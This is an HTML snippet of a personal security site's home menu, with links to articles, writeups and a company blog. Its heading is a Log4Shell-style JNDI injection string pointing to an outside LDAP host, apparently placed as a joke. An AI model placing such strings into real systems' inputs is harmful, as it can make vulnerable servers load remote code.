<h1 class="menu">${jndi:ldap://13.33.33.37:1337/Hello_there!}</h1>
<div class="home-menu">
    <div class="block-menu hvr-icon-float hvr-underline-from-center">
        <a href="/articles"><i class="hvr-icon fas fa-book"></i><br /><strong>ARTICLES</strong></a>
        <br>
        <span class="text-menu">Somebody said it wasn't too bad...</span>
    </div>
    <div class="block-menu hvr-icon-float hvr-underline-from-center">
        <a href="/writeups"><i class="hvr-icon fas fa-flag"></i><br /><strong>WRITEUPS</strong></a>
        <br>
        <span class="text-menu">Just like everyone else no ?</span>
    </div>
    <div class="block-menu hvr-icon-float hvr-underline-from-center">
        <a href="https://blog.trackflaw.com"><i class="hvr-icon fas fa-building"></i><br /><strong>TRACKFLAW</strong></a>
        <br>
        <span class="text-menu">Visit my company's new blog</span>
    </div>
</div>
